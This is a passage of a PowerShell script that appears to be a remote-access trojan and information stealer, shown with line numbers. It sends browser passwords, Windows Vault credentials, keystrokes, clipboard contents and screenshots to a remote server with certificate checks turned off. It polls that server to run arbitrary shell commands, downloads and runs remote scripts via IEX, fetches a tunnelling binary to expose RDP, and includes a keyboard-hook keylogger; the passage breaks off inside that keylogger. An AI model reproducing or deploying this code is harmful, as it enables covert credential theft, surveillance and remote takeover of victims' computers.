667 | $content = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($content)) | |
668 | $json = @{"resolution" = $resolution; "domain" = $domain; "computer_name" = $computer_name; "username" = $username; "timezone" = $timezone; "hashid" = $hashid; "version" = $version; "content" = $content; "type" = "chbrwpwd"} | |
669 | $log_json = $json | ConvertTo-Json | |
670 | $buffer = [System.Text.Encoding]::UTF8.GetBytes($log_json) | |
671 | write-host $buffer | |
672 | $url+'/pshlog' | |
673 | [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($url+'/pshlog') | |
674 | $webRequest.ContentType = "application/json" | |
675 | $webRequest.Timeout = 10000 | |
676 | $webRequest.Method = "POST" | |
677 | $webRequest.ContentLength = $buffer.Length; | |
678 | ||
679 | ||
680 | $requestStream = $webRequest.GetRequestStream() | |
681 | $requestStream.Write($buffer, 0, $buffer.Length) | |
682 | $requestStream.Flush() | |
683 | $requestStream.Close() | |
684 | ||
685 | [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse() | |
686 | $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream()) | |
687 | $result = $streamReader.ReadToEnd() | |
688 | } | |
689 | } -ArgumentList $params.url, $params.resolution, $params.domain, $params.computer_name, $params.username, $params.timezone, $params.hashid, $params.version | |
690 | } | |
691 | ||
692 | function GetVault { | |
693 | Start-Job -ScriptBlock { | |
694 | function Escape-JSONString($str){ | |
695 | if ($str -eq $null) {return ""} | |
696 | $str = $str.ToString().Replace('"','\"').Replace('\','\\').Replace("`n",'\n').Replace("`r",'\r').Replace("`t",'\t') | |
697 | return $str; | |
698 | } | |
699 | ||
700 | function ConvertTo-JSON($maxDepth = 4,$forceArray = $false) { | |
701 | begin { | |
702 | $data = @() | |
703 | } | |
704 | process{ | |
705 | $data += $_ | |
706 | } | |
707 | ||
708 | end{ | |
709 | ||
710 | if ($data.length -eq 1 -and $forceArray -eq $false) { | |
711 | $value = $data[0] | |
712 | } else { | |
713 | $value = $data | |
714 | } | |
715 | ||
716 | if ($value -eq $null) { | |
717 | return "null" | |
718 | } | |
719 | ||
720 | ||
721 | ||
722 | $dataType = $value.GetType().Name | |
723 | ||
724 | switch -regex ($dataType) { | |
725 | 'String' { | |
726 | return "`"{0}`"" -f (Escape-JSONString $value ) | |
727 | } | |
728 | '(System\.)?DateTime' {return "`"{0:yyyy-MM-dd}T{0:HH:mm:ss}`"" -f $value} | |
729 | 'Int32|Double' {return "$value"} | |
730 | 'Boolean' {return "$value".ToLower()} | |
731 | '(System\.)?Object\[\]' { # array | |
732 | ||
733 | if ($maxDepth -le 0){return "`"$value`""} | |
734 | ||
735 | $jsonResult = '' | |
736 | foreach($elem in $value){ | |
737 | #if ($elem -eq $null) {continue} | |
738 | if ($jsonResult.Length -gt 0) {$jsonResult +=', '} | |
739 | $jsonResult += ($elem | ConvertTo-JSON -maxDepth ($maxDepth -1)) | |
740 | } | |
741 | return "[" + $jsonResult + "]" | |
742 | } | |
743 | '(System\.)?Hashtable' { # hashtable | |
744 | $jsonResult = '' | |
745 | foreach($key in $value.Keys){ | |
746 | if ($jsonResult.Length -gt 0) {$jsonResult +=', '} | |
747 | $jsonResult += | |
748 | @" | |
749 | "{0}": {1} | |
750 | "@ -f $key , ($value[$key] | ConvertTo-JSON -maxDepth ($maxDepth -1) ) | |
751 | } | |
752 | return "{" + $jsonResult + "}" | |
753 | } | |
754 | default { #object | |
755 | if ($maxDepth -le 0){return "`"{0}`"" -f (Escape-JSONString $value)} | |
756 | ||
757 | return "{" + | |
758 | (($value | Get-Member -MemberType *property | % { | |
759 | @" | |
760 | "{0}": {1} | |
761 | "@ -f $_.Name , ($value.($_.Name) | ConvertTo-JSON -maxDepth ($maxDepth -1) ) | |
762 | ||
763 | }) -join ', ') + "}" | |
764 | } | |
765 | } | |
766 | } | |
767 | } | |
768 | ||
769 | $url = $args[0] | |
770 | $resolution = $args[1] | |
771 | $domain = $args[2] | |
772 | $computer_name = $args[3] | |
773 | $username = $args[4] | |
774 | $timezone = $args[5] | |
775 | $hashid = $args[6] | |
776 | $version = $args[7] | |
777 | $vault_url = $url+'/script?id=random&name=vault' | |
778 | Write-host $vault_url | |
779 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } | |
780 | IEX (New-Object Net.WebClient).DownloadString($vault_url); Get-VaultCredential -OutVariable vaultcreds -ErrorAction SilentlyContinue | |
781 | #Write-host 'ERROR' | |
782 | #$vaultcredserror | |
783 | $vaultcreds = $vaultcreds | Out-String | |
784 | $content = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($vaultcreds)) | |
785 | if ($content.length -ne 0) { | |
786 | $json = @{"resolution" = $resolution; "domain" = $domain; "computer_name" = $computer_name; "username" = $username; "timezone" = $timezone; "hashid" = $hashid; "version" = $version; "content" = $content; "type" = "vault"} | |
787 | $json | |
788 | $log_json = $json | ConvertTo-Json | |
789 | ||
790 | $buffer = [System.Text.Encoding]::UTF8.GetBytes($log_json) | |
791 | write-host $buffer | |
792 | ||
793 | [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($url+'/pshlog') | |
794 | $webRequest.ContentType = "application/json" | |
795 | $webRequest.Timeout = 10000 | |
796 | $webRequest.Method = "POST" | |
797 | $webRequest.ContentLength = $buffer.Length; | |
798 | ||
799 | ||
800 | $requestStream = $webRequest.GetRequestStream() | |
801 | $requestStream.Write($buffer, 0, $buffer.Length) | |
802 | $requestStream.Flush() | |
803 | $requestStream.Close() | |
804 | ||
805 | [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse() | |
806 | $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream()) | |
807 | $result = $streamReader.ReadToEnd() | |
808 | } | |
809 | ||
810 | } -ArgumentList $params.url, $params.resolution, $params.domain, $params.computer_name, $params.username, $params.timezone, $params.hashid, $params.version | |
811 | } | |
812 | ||
813 | ||
814 | function WebGet { | |
815 | Start-Job -ScriptBlock { | |
816 | $url = $args[0] | |
817 | $resolution = $args[1] | |
818 | $domain = $args[2] | |
819 | $computer_name = $args[3] | |
820 | $username = $args[4] | |
821 | $timezone = $args[5] | |
822 | $hashid = $args[6] | |
823 | $version = $args[7] | |
824 | while ($true) { | |
825 | $WebClient=New-Object net.webclient | |
826 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } | |
827 | $String=$WebClient.DownloadString($url+"/command?domain=$domain&username=$username&hashid=$hashid&computer_name=$computer_name&ver=$version") | |
828 | if ($String -ne '0') { | |
829 | foreach ($cmd in ($string -split '["\n\r"|"\r\n"|\n|\r]')) { | |
830 | if ($cmd.StartsWith("+screenshot",1)) { $cmd | Out-File $env:temp\keywords.txt } | |
831 | elseif ($cmd.StartsWith("-screenshot",1)) { Remove-Item $env:temp\keywords.txt } | |
832 | elseif ($cmd.StartsWith("+vnc", 1)) { | |
833 | if([IntPtr]::Size -eq 8) { | |
834 | & cmd /c %systemroot%\syswow64\windowspowershell\v1.0\powershell.exe "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { `$true }; IEX (New-Object Net.WebClient).DownloadString('$url/script?id=1&name=vnc');" | |
835 | } | |
836 | else { & cmd /c %systemroot%\system32\windowspowershell\v1.0\powershell.exe "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { `$true }; IEX (New-Object Net.WebClient).DownloadString('$url/script?id=1&name=vnc');" } | |
837 | } | |
838 | # +rdp username;password;trigger-port;10.0.0.1 | |
839 | elseif ($cmd.StartsWith("+rdp", 1)) { | |
840 | $creds = ($cmd.split(' '))[1] | |
841 | $plink_username = ($creds.split(';'))[0] | |
842 | $plink_password = ($creds.split(';'))[1] | |
843 | $plink_trigger_port = ($creds.split(';'))[2] | |
844 | $plink_ip = ($creds.split(';'))[3] | |
845 | $plink_username, $plink_password, $plink_trigger_port, $plink_ip | |
846 | Start-Job -ScriptBlock { | |
847 | #IF ((Test-Path "$env:temp\plink.exe") -eq $False) { (New-Object System.Net.WebClient).DownloadFile('https://the.earth.li/~sgtatham/putty/latest/x86/plink.exe', "$env:temp\plink.exe");} | |
848 | IF ((Test-Path "$env:temp\stnlc.exe") -eq $False) | |
849 | { | |
850 | (New-Object System.Net.WebClient).DownloadFile('http://sylviabodenheimer.ch/css/stnlc.bin', "$env:temp\stnlc.exe") | |
851 | (New-Object System.Net.WebClient).DownloadFile('http://sylviabodenheimer.ch/css/CiWinCng32.dll', "$env:temp\CiWinCng32.dll") | |
852 | } | |
853 | $plink_username = $args[0] | |
854 | $plink_password = $args[1] | |
855 | $plink_trigger_port = $args[2] | |
856 | $plink_ip = $args[3] | |
857 | Stop-Process -name stnlc -ErrorAction SilentlyContinue | |
858 | #& cmd /c "echo yes | $env:temp\plink.exe -R "+$plink_trigger_port+":127.0.0.1:3389 -l $plink_username -pw $plink_password $plink_ip -N" } -ArgumentList $plink_username, $plink_password, $plink_trigger_port, $plink_ip } | |
859 | & cmd /c "echo S | $env:temp\stnlc.exe $plink_username@$plink_ip -s2c=0.0.0.0,$plink_trigger_port,localhost,3389 -pw=$plink_password" | |
860 | & cmd /c "$env:temp\stnlc.exe $plink_username@$plink_ip -s2c=0.0.0.0,$plink_trigger_port,localhost,3389 -pw=$plink_password -unat=y" | |
861 | } -ArgumentList $plink_username, $plink_password, $plink_trigger_port, $plink_ip } | |
862 | elseif ($cmd -ne '') { Start-Job -ScriptBlock {& cmd /c $args[0]} -ArgumentList $cmd | |
863 | Write-Host $args[0] | |
864 | ||
865 | }}} | |
866 | $WebGetTimer = 1200 | |
867 | Start-Sleep -Seconds $WebGetTimer | |
868 | } | |
869 | } -ArgumentList $params.url, $params.resolution, $params.domain, $params.computer_name, $params.username, $params.timezone, $params.hashid, $params.version | |
870 | } | |
871 | ||
872 | function PostFile($file_name) { | |
873 | $name = (Get-ChildItem $file_name).name | |
874 | $bytes = [System.IO.File]::ReadAllBytes($file_name) | |
875 | $enc = [System.Text.Encoding]::GetEncoding($codePageName) | |
876 | $data = $enc.GetString($bytes) | |
877 | ||
878 | [System.Net.WebRequest]$webRequest = [System.Net.WebRequest]::Create($params.url+'/pshscr') | |
879 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } | |
880 | $webRequest.ContentType = "image/jpeg" | |
881 | $webRequest.Method = "POST" | |
882 | [byte[]]$bytes = $enc.GetBytes($data); | |
883 | $webRequest.ContentLength = $bytes.Length; | |
884 | $webRequest.Headers.add('content-disposition', "file=$name") | |
885 | $webRequest.Headers.add('hashid', $params.hashid) | |
886 | $webRequest.Headers.add('computer_name', $params.computer_name) | |
887 | $webRequest.Headers.add('domain', $params.domain) | |
888 | $webRequest.Headers.add('username', $params.username) | |
889 | [System.IO.Stream]$reqStream = $webRequest.GetRequestStream() | |
890 | $reqStream.Write($bytes, 0, $bytes.Length); | |
891 | $reqStream.Flush(); | |
892 | ||
893 | $resp = $webRequest.GetResponse(); | |
894 | $rs = $resp.GetResponseStream(); | |
895 | [System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $rs; | |
896 | $sr.ReadToEnd(); | |
897 | ||
898 | } | |
899 | ||
900 | ||
901 | ||
902 | function WebPost { | |
903 | $pshlog_url = $params.url+"/pshlog" | |
904 | while ($true) { | |
905 | $WebPostTimer = 1200 | |
906 | Start-Sleep -Seconds $WebPostTimer | |
907 | Write-host $params.log_file | |
908 | If (Test-Path $log_file) { | |
909 | #$content = [IO.File]::ReadAllText($params.log_file) | |
910 | $aaa = Get-Content $params.log_file | |
911 | $content = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($aaa)) | |
912 | $json = @{"resolution" = $params.resolution; "domain" = $params.domain; "computer_name" = $params.computer_name; "username" = $params.username; "timezone" = $params.timezone; "hashid" = $params.hashid; "version" = $params.version; "content" = $content; "type" = "keylog"} | |
913 | $log_json = $json | ConvertTo-Json | |
914 | Write-Host $log_json | |
915 | $buffer = [System.Text.Encoding]::UTF8.GetBytes($log_json) | |
916 | [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create($pshlog_url) | |
917 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } | |
918 | $webRequest.ContentType = "application/json" | |
919 | $webRequest.Timeout = 10000 | |
920 | $webRequest.Method = "POST" | |
921 | $webRequest.ContentLength = $buffer.Length; | |
922 | ||
923 | ||
924 | $requestStream = $webRequest.GetRequestStream() | |
925 | $requestStream.Write($buffer, 0, $buffer.Length) | |
926 | $requestStream.Flush() | |
927 | $requestStream.Close() | |
928 | ||
929 | [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse() | |
930 | $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream()) | |
931 | $result = $streamReader.ReadToEnd() | |
932 | Remove-Item $log_file | |
933 | } | |
934 | if (Test-Path "$env:Temp\Applnsights_VisualStudio.txt") { | |
935 | ||
936 | $clipfile = "$env:Temp\Applnsights_VisualStudio.txt" | |
937 | $aaa = Get-Content $clipfile | Out-String | |
938 | $content = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes($aaa)) | |
939 | ||
940 | $json = @{"resolution" = $params.resolution; "domain" = $params.domain; "computer_name" = $params.computer_name; "username" = $params.username; "timezone" = $params.timezone; "hashid" = $params.hashid; "version" = $params.version; "content" = $content; "type" = "clipboard"} | |
941 | $log_json = $json | ConvertTo-Json | |
942 | write-host $log_json | |
943 | $buffer = [System.Text.Encoding]::UTF8.GetBytes($log_json) | |
944 | [System.Net.HttpWebRequest] $webRequest = [System.Net.WebRequest]::Create("$pshlog_url") | |
945 | [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true } | |
946 | $webRequest.ContentType = "application/json" | |
947 | $webRequest.Timeout = 10000 | |
948 | $webRequest.Method = "POST" | |
949 | $webRequest.ContentLength = $buffer.Length; | |
950 | ||
951 | ||
952 | $requestStream = $webRequest.GetRequestStream() | |
953 | $requestStream.Write($buffer, 0, $buffer.Length) | |
954 | $requestStream.Flush() | |
955 | $requestStream.Close() | |
956 | ||
957 | [System.Net.HttpWebResponse] $webResponse = $webRequest.GetResponse() | |
958 | $streamReader = New-Object System.IO.StreamReader($webResponse.GetResponseStream()) | |
959 | $result = $streamReader.ReadToEnd() | |
960 | Remove-Item $clipfile | |
961 | } | |
962 | ||
963 | ||
964 | $directoryInfo = Get-ChildItem $ScreenshotPath | |
965 | If ($directoryInfo) { | |
966 | $directoryInfo | ForEach-Object { | |
967 | Write-Host $_.FullName | |
968 | PostFile($_.FullName) | |
969 | Remove-Item $_.FullName | |
970 | } | |
971 | } | |
972 | } | |
973 | } | |
974 | ||
975 | ||
976 | function Get-Keystrokes { | |
977 | <# | |
978 | .SYNOPSIS | |
979 | ||
980 | .PARAMETER LogPath | |
981 | ||
982 | Specifies the path where pressed key details will be logged. By default, keystrokes are logged to %TEMP%\key.log. | |
983 | ||
984 | .PARAMETER Timeout | |
985 | ||
986 | Specifies the interval in minutes to capture keystrokes. By default, keystrokes are captured indefinitely. | |
987 | ||
988 | .PARAMETER PassThru | |
989 | ||
990 | Returns the keylogger's PowerShell object, so that it may manipulated (disposed) by the user; primarily for testing purposes. | |
991 | ||
992 | .EXAMPLE | |
993 | ||
994 | Get-Keystrokes -LogPath C:\key.log | |
995 | ||
996 | .EXAMPLE | |
997 | ||
998 | Get-Keystrokes -Timeout 20 | |
999 | ||
1000 | .LINK | |
1001 | ||
1002 | http://www.obscuresec.com/ | |
1003 | http://www.exploit-monday.com/ | |
1004 | https://github.com/secabstraction | |
1005 | https://github.com/ahhh/PSSE | |
1006 | ||
1007 | #> | |
1008 | [CmdletBinding()] | |
1009 | Param ( | |
1010 | [Parameter(Position = 0)] | |
1011 | [ValidateScript({Test-Path (Resolve-Path (Split-Path -Parent -Path $_)) -PathType Container})] | |
1012 | [String]$LogPath = "$($env:TEMP)\key.log", | |
1013 | ||
1014 | [Parameter(Position = 1)] | |
1015 | [Double]$Timeout, | |
1016 | ||
1017 | [Parameter()] | |
1018 | [Switch]$PassThru | |
1019 | ) | |
1020 | ||
1021 | $LogPath = Join-Path (Resolve-Path (Split-Path -Parent $LogPath)) (Split-Path -Leaf $LogPath) | |
1022 | ||
1023 | try { '"TypedKey","WindowTitle","Time"' | Out-File -FilePath $LogPath -Encoding unicode } | |
1024 | catch { throw $_ } | |
1025 | ||
1026 | $Script = { | |
1027 | Param ( | |
1028 | [Parameter(Position = 0)] | |
1029 | [String]$LogPath, | |
1030 | ||
1031 | [Parameter(Position = 1)] | |
1032 | [Double]$Timeout | |
1033 | ) | |
1034 | ||
1035 | function local:Get-DelegateType { | |
1036 | Param ( | |
1037 | [OutputType([Type])] | |
1038 | ||
1039 | [Parameter( Position = 0)] | |
1040 | [Type[]] | |
1041 | $Parameters = (New-Object Type[](0)), | |
1042 | ||
1043 | [Parameter( Position = 1 )] | |
1044 | [Type] | |
1045 | $ReturnType = [Void] | |
1046 | ) | |
1047 | ||
1048 | $Domain = [AppDomain]::CurrentDomain | |
1049 | $DynAssembly = New-Object Reflection.AssemblyName('ReflectedDelegate') | |
1050 | $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run) | |
1051 | $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false) | |
1052 | $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) | |
1053 | $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters) | |
1054 | $ConstructorBuilder.SetImplementationFlags('Runtime, Managed') | |
1055 | $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters) | |
1056 | $MethodBuilder.SetImplementationFlags('Runtime, Managed') | |
1057 | ||
1058 | $TypeBuilder.CreateType() | |
1059 | } | |
1060 | function local:Get-ProcAddress { | |
1061 | Param ( | |
1062 | [OutputType([IntPtr])] | |
1063 | ||
1064 | [Parameter( Position = 0, Mandatory = $True )] | |
1065 | [String] | |
1066 | $Module, | |
1067 | ||
1068 | [Parameter( Position = 1, Mandatory = $True )] | |
1069 | [String] | |
1070 | $Procedure | |
1071 | ) | |
1072 | ||
1073 | # Get a reference to System.dll in the GAC | |
1074 | $SystemAssembly = [AppDomain]::CurrentDomain.GetAssemblies() | | |
1075 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') } | |
1076 | $UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods') | |
1077 | # Get a reference to the GetModuleHandle and GetProcAddress methods | |
1078 | $GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle') | |
1079 | $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress') | |
1080 | # Get a handle to the module specified | |
1081 | $Kern32Handle = $GetModuleHandle.Invoke($null, @($Module)) | |
1082 | $tmpPtr = New-Object IntPtr | |
1083 | $HandleRef = New-Object System.Runtime.InteropServices.HandleRef($tmpPtr, $Kern32Handle) | |
1084 | ||
1085 | # Return the address of the function | |
1086 | $GetProcAddress.Invoke($null, @([Runtime.InteropServices.HandleRef]$HandleRef, $Procedure)) | |
1087 | } | |
1088 | ||
1089 | #region Imports | |
1090 | ||
1091 | [void][Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms') | |
1092 | ||
1093 | # SetWindowsHookEx | |
1094 | $SetWindowsHookExAddr = Get-ProcAddress user32.dll SetWindowsHookExA | |
1095 | $SetWindowsHookExDelegate = Get-DelegateType @([Int32], [MulticastDelegate], [IntPtr], [Int32]) ([IntPtr]) | |
1096 | $SetWindowsHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SetWindowsHookExAddr, $SetWindowsHookExDelegate) | |
1097 | ||
1098 | # CallNextHookEx | |
1099 | $CallNextHookExAddr = Get-ProcAddress user32.dll CallNextHookEx | |
1100 | $CallNextHookExDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr], [IntPtr]) ([IntPtr]) | |
1101 | $CallNextHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CallNextHookExAddr, $CallNextHookExDelegate) | |
1102 | ||
1103 | # UnhookWindowsHookEx | |
1104 | $UnhookWindowsHookExAddr = Get-ProcAddress user32.dll UnhookWindowsHookEx | |
1105 | $UnhookWindowsHookExDelegate = Get-DelegateType @([IntPtr]) ([Void]) | |
1106 | $UnhookWindowsHookEx = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UnhookWindowsHookExAddr, $UnhookWindowsHookExDelegate) | |
1107 | ||
1108 | # PeekMessage | |
1109 | $PeekMessageAddr = Get-ProcAddress user32.dll PeekMessageA | |
1110 | $PeekMessageDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UInt32], [UInt32], [UInt32]) ([Void]) | |
1111 | $PeekMessage = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PeekMessageAddr, $PeekMessageDelegate) | |
1112 | ||
1113 | # GetAsyncKeyState | |
1114 | $GetAsyncKeyStateAddr = Get-ProcAddress user32.dll GetAsyncKeyState | |
1115 | $GetAsyncKeyStateDelegate = Get-DelegateType @([Windows.Forms.Keys]) ([Int16]) | |
1116 | $GetAsyncKeyState = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetAsyncKeyStateAddr, $GetAsyncKeyStateDelegate) | |
1117 | ||
1118 | # GetForegroundWindow | |
1119 | $GetForegroundWindowAddr = Get-ProcAddress user32.dll GetForegroundWindow | |
1120 | $GetForegroundWindowDelegate = Get-DelegateType @() ([IntPtr]) | |
1121 | $GetForegroundWindow = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetForegroundWindowAddr, $GetForegroundWindowDelegate) | |
1122 | ||
1123 | # GetWindowText | |
1124 | $GetWindowTextAddr = Get-ProcAddress user32.dll GetWindowTextA | |
1125 | $GetWindowTextDelegate = Get-DelegateType @([IntPtr], [Text.StringBuilder], [Int32]) ([Void]) | |
1126 | $GetWindowText = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetWindowTextAddr, $GetWindowTextDelegate) | |
1127 | ||
1128 | # GetModuleHandle | |
1129 | $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA | |
1130 | $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr]) | |
1131 | $GetModuleHandle = [Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate) | |
1132 | ||
1133 | #endregion Imports | |
1134 | ||
1135 | $CallbackScript = { | |
1136 | Param ( | |
1137 | [Parameter()] | |
1138 | [Int32]$Code, | |
1139 | ||
1140 | [Parameter()] | |
1141 | [IntPtr]$wParam, | |
1142 | ||
1143 | [Parameter()] | |
1144 | [IntPtr]$lParam | |
1145 | ) | |
1146 | ||
1147 | $Keys = [Windows.Forms.Keys] | |
1148 | ||
1149 | $MsgType = $wParam.ToInt32() | |
1150 | ||
1151 | # Process WM_KEYDOWN & WM_SYSKEYDOWN messages | |
1152 | if ($Code -ge 0 -and ($MsgType -eq 0x100 -or $MsgType -eq 0x104)) { | |
1153 | ||
1154 | $hWindow = $GetForegroundWindow.Invoke() | |
1155 | ||
1156 | $ShiftState = $GetAsyncKeyState.Invoke($Keys::ShiftKey) | |
1157 | if (($ShiftState -band 0x8000) -eq 0x8000) { $Shift = $true } | |
1158 | else { $Shift = $false } | |
1159 | ||
1160 | $Caps = [Console]::CapsLock | |
1161 | ||
1162 | # Read virtual-key from buffer | |
1163 | $vKey = [Windows.Forms.Keys][Runtime.InteropServices.Marshal]::ReadInt32($lParam) | |
1164 | ||
1165 | # Parse virtual-key | |
1166 | if ($vKey -gt 64 -and $vKey -lt 91) { # Alphabet characters | |
1167 | if ($Shift -xor $Caps) { $Key = $vKey.ToString() } | |
1168 | else { $Key = $vKey.ToString().ToLower() } | |
1169 | } | |
1170 | elseif ($vKey -ge 96 -and $vKey -le 111) { # Number pad characters | |
1171 | switch ($vKey.value__) { | |
1172 | 96 { $Key = '0' } | |
1173 | 97 { $Key = '1' } | |
1174 | 98 { $Key = '2' } | |
1175 | 99 { $Key = '3' } | |
1176 | 100 { $Key = '4' } | |
1177 | 101 { $Key = '5' } | |
1178 | 102 { $Key = '6' } | |
1179 | 103 { $Key = '7' } | |
1180 | 104 { $Key = '8' } | |
1181 | 105 { $Key = '9' } | |
1182 | 106 { $Key = "*" } | |
1183 | 107 { $Key = "+" } | |
1184 | 108 { $Key = "|" } | |
1185 | 109 { $Key = "-" } | |
1186 | 110 { $Key = "." } | |
1187 | 111 { $Key = "/" } | |
1188 | } | |
1189 | } | |
1190 | elseif (($vKey -ge 48 -and $vKey -le 57) -or ($vKey -ge 186 -and $vKey -le 192) -or ($vKey -ge 219 -and $vKey -le 222)) { | |
1191 | if ($Shift) { | |
1192 | switch ($vKey.value__) { # Shiftable characters | |
1193 | 48 { $Key = ')' } | |
1194 | 49 { $Key = '!' } | |
1195 | 50 { $Key = '@' } | |
1196 | 51 { $Key = '#' } | |
1197 | 52 { $Key = '$' } | |
1198 | 53 { $Key = '%' } | |
1199 | 54 { $Key = '^' } | |
1200 | 55 { $Key = '&' } | |
1201 | 56 { $Key = '*' } | |
1202 | 57 { $Key = '(' } | |
1203 | 186 { $Key = ':' } | |
1204 | 187 { $Key = '+' } | |
1205 | 188 { $Key = '<' } | |
1206 | 189 { $Key = '_' } | |
1207 | 190 { $Key = '>' } | |
1208 | 191 { $Key = '?' } | |
1209 | 192 { $Key = '~' } | |
1210 | 219 { $Key = '{' } | |
1211 | 220 { $Key = '|' } | |
1212 | 221 { $Key = '}' } | |
1213 | 222 { $Key = '<Double Quotes>' } | |
1214 | } | |
1215 | } | |
1216 | else { | |
1217 | switch ($vKey.value__) { | |
1218 | 48 { $Key = '0' } | |
1219 | 49 { $Key = '1' } | |
1220 | 50 { $Key = '2' } | |
1221 | 51 { $Key = '3' } | |
1222 | 52 { $Key = '4' } | |
1223 | 53 { $Key = '5' } | |
1224 | 54 { $Key = '6' } | |
1225 | 55 { $Key = '7' } | |
1226 | 56 { $Key = '8' } | |
1227 | 57 { $Key = '9' } | |
1228 | 186 { $Key = ';' } | |
1229 | 187 { $Key = '=' } | |
1230 | 188 { $Key = ',' } | |
1231 | 189 { $Key = '-' } | |
1232 | 190 { $Key = '.' } | |
1233 | 191 { $Key = '/' } | |
1234 | 192 { $Key = '`' } | |
1235 | 219 { $Key = '[' } | |
1236 | 220 { $Key = '\' } | |
1237 | 221 { $Key = ']' } | |
1238 | 222 { $Key = '<Single Quote>' } | |
1239 | } | |
1240 | } | |
1241 | } | |
1242 | else { | |
1243 | switch ($vKey) { | |
1244 | $Keys::F1 { $Key = '<F1>' } | |
1245 | $Keys::F2 { $Key = '<F2>' } | |
1246 | $Keys::F3 { $Key = '<F3>' } | |
1247 | $Keys::F4 { $Key = '<F4>' } | |
1248 | $Keys::F5 { $Key = '<F5>' } | |
1249 | $Keys::F6 { $Key = '<F6>' } | |
1250 | $Keys::F7 { $Key = '<F7>' } | |
1251 | $Keys::F8 { $Key = '<F8>' } | |
1252 | $Keys::F9 { $Key = '<F9>' } | |
1253 | $Keys::F10 { $Key = '<F10>' } | |
1254 | $Keys::F11 { $Key = '<F11>' } | |
1255 | $Keys::F12 { $Key = '<F12>' } | |
1256 | ||
1257 | $Keys::Snapshot { $Key = '<Print Screen>' } | |
1258 | $Keys::Scroll { $Key = '<Scroll Lock>' } | |
1259 | $Keys::Pause { $Key = '<Pause/Break>' } | |
1260 | $Keys::Insert { $Key = '<Insert>' } | |
1261 | $Keys::Home { $Key = '<Home>' } | |
1262 | $Keys::Delete { $Key = '<Delete>' } | |
1263 | $Keys::End { $Key = '<End>' } | |
1264 | $Keys::Prior { $Key = '<Page Up>' } | |
1265 | $Keys::Next { $Key = '<Page Down>' } | |
1266 | $Keys::Escape { $Key = '<Esc>' } | |
1267 | $Keys::NumLock { $Key = '<Num Lock>' } | |
1268 | $Keys::Capital { $Key = '<Caps Lock>' } | |
1269 | $Keys::Tab { $Key = '<Tab>' } | |
1270 | $Keys::Back { $Key = '<Backspace>' } | |
1271 | $Keys::Enter { $Key = '<Enter>' } | |
1272 | $Keys::Space { $Key = '< >' } | |
1273 | $Keys::Left { $Key = '<Left>' } | |
1274 | $Keys::Up { $Key = '<Up>' } | |
1275 | $Keys::Right { $Key = '<Right>' } | |
1276 | $Keys::Down { $Key = '<Down>' } | |
1277 | $Keys::LMenu { $Key = '<Alt>' } | |
1278 | $Keys::RMenu { $Key = '<Alt>' } | |
1279 | $Keys::LWin { $Key = '<Windows Key>' } | |
1280 | $Keys::RWin { $Key = '<Windows Key>' } | |
1281 | $Keys::LShiftKey { $Key = '<Shift>' } | |
1282 | $Keys::RShiftKey { $Key = '<Shift>' } | |
1283 | $Keys::LControlKey { $Key = '<Ctrl>' } | |
1284 | $Keys::RControlKey { $Key = '<Ctrl>' } | |
1285 | $Keys::MouseClick { $Key = '<LMouse>' } | |
1286 | } | |
1287 | } | |
1288 | ||
1289 | # Get foreground window's title | |
1290 | $Title = New-Object Text.Stringbuilder 256 | |
1291 | $GetWindowText.Invoke($hWindow, $Title, $Title.Capacity) | |
1292 | ||
1293 | # Define object properties | |
1294 | $Props = @{ | |
1295 | Key = $Key | |
1296 | Time = [DateTime]::Now | |
1297 | Window = $Title.ToString() | |
1298 | ||
1299 | } | |
1300 | ||
1301 | $obj = New-Object psobject -Property $Props | |
1302 | ||
